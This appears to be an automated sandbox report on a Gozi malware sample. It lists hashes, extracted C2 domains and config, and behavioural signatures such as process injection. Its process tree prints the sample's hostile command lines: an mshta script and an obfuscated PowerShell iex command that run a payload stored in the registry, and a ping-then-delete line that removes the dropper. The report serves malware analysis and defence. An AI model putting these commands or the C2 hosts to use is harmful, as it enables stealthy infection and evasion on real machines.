Analysis
- max time kernel: 150s
- max time network: 135s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 16-11-2022 01:07
Behavioral task
- behavioral1
- Sample: main.exe
- Resource: win7-20221111-en
General
- Target: main.exe
- Size: 37KB
- MD5: 9676298f24c8cdd4b532ac027a00f60e
- SHA1: 8d0bd57712533f1a889627706925c17ed4347ce5
- SHA256: 0f5cce66023859e9d7e3f54b78e95bf09618db5ed01fe05b765d76ab156271da
- SHA512: 525b70896530a60cf58de64e8052ef2a8eb5ccc73d86fcd1f55d4850e682e3ff44c7ebc18ab029fc479b75a9a0083765c314c542b356d7ef8a7e7e493f13e7fd
- SSDEEP: 768:/QLm41fM01vAqyRrlpItKFyr8MS1g7/s1w70anLq:/L41fMSvXArbYVrO0/saLq
Malware Config
Extracted
- Family: gozi
- 5
- C2: lentaphoto.at, iujdhsndjfks.ru, gameindikdowd.ru, jhgfdlkjhaoiu.su
- base_path: /uploaded/
- build: 250246
- exe_type: loader
- extension: .pct
- server_id: 50
Extracted
- Family: gozi
- 5
- C2: lentaphoto.at, iujdhsndjfks.ru, gameindikdowd.ru, jhgfdlkjhaoiu.su
- base_path: /uploaded/
- build: 250246
- exe_type: worker
- extension: .pct
- server_id: 50
Signatures
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Processes:
    mshta.exe: key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation
- Suspicious use of SetThreadContext (7 IoCs)
  Processes (source PID/process -> target PID/process):
    4228 powershell.exe -> 1084 Explorer.EXE
    1084 Explorer.EXE -> 3508 RuntimeBroker.exe
    1084 Explorer.EXE -> 3740 RuntimeBroker.exe
    1084 Explorer.EXE -> 4648 RuntimeBroker.exe
    1084 Explorer.EXE -> 4008 cmd.exe
    4008 cmd.exe -> 4556 PING.EXE
    1084 Explorer.EXE -> 3500 cmd.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Runs ping.exe (1 TTP, 1 IoC)
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  Processes:
    4556 PING.EXE
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes (PID process, number of entries):
    4944 main.exe (2)
    4228 powershell.exe (2)
    1084 Explorer.EXE (60)
- Suspicious behavior: MapViewOfSection (7 IoCs)
  Processes (PID process, number of entries):
    4228 powershell.exe (1)
    1084 Explorer.EXE (5)
    4008 cmd.exe (1)
- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes (token, PID process, number of entries):
    SeDebugPrivilege 4228 powershell.exe (1)
    SeShutdownPrivilege 1084 Explorer.EXE (3)
    SeCreatePagefilePrivilege 1084 Explorer.EXE (3)
- Suspicious use of SetWindowsHookEx (1 IoC)
  Processes:
    1084 Explorer.EXE
- Suspicious use of WriteProcessMemory (42 IoCs)
  Processes (source PID/process -> target PID/process, number of entries):
    3416 mshta.exe -> 4228 powershell.exe (2)
    4228 powershell.exe -> 1204 csc.exe (2)
    1204 csc.exe -> 3244 cvtres.exe (2)
    4228 powershell.exe -> 996 csc.exe (2)
    996 csc.exe -> 4668 cvtres.exe (2)
    4228 powershell.exe -> 1084 Explorer.EXE (4)
    1084 Explorer.EXE -> 3508 RuntimeBroker.exe (4)
    1084 Explorer.EXE -> 4008 cmd.exe (5)
    1084 Explorer.EXE -> 3740 RuntimeBroker.exe (4)
    1084 Explorer.EXE -> 4648 RuntimeBroker.exe (4)
    4008 cmd.exe -> 4556 PING.EXE (5)
    1084 Explorer.EXE -> 3500 cmd.exe (6)
Processes (nested by parent/child relationship)
- C:\Windows\System32\RuntimeBroker.exe
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\Explorer.EXE
  Command line: C:\Windows\Explorer.EXE
  Signatures: Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\main.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\main.exe"
    Signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Windows\System32\mshta.exe
    Command line: "C:\Windows\System32\mshta.exe" "about:<hta:application><script>D03n='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(D03n).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\51C98FB5-7C72-AB2B-0E15-700F2219A4B3\\\TypePack'));if(!window.flag)close()</script>"
    Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vwoehytn -value gp; new-alias -name sxogiw -value iex; sxogiw ([System.Text.Encoding]::ASCII.GetString((vwoehytn "HKCU:Software\AppDataLow\Software\Microsoft\51C98FB5-7C72-AB2B-0E15-700F2219A4B3").VirtualWhite))
      Signatures: Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wqc0pj5w\wqc0pj5w.cmdline"
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6992.tmp" "c:\Users\Admin\AppData\Local\Temp\wqc0pj5w\CSCE0E47F3140F1453FB942649E8633FE.TMP"
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g4yz3ulg\g4yz3ulg.cmdline"
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6A6D.tmp" "c:\Users\Admin\AppData\Local\Temp\g4yz3ulg\CSC1B531F9EE47F45A8B7CEEC91AA512F2.TMP"
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\main.exe"
    Signatures: Suspicious use of SetThreadContext; Suspicious behavior: MapViewOfSection; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\PING.EXE
      Command line: ping localhost -n 5
      Signatures: Runs ping.exe; Suspicious behavior: CmdExeWriteProcessMemorySpam
  - C:\Windows\syswow64\cmd.exe
    Command line: "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
- C:\Windows\System32\RuntimeBroker.exe
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\System32\RuntimeBroker.exe
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads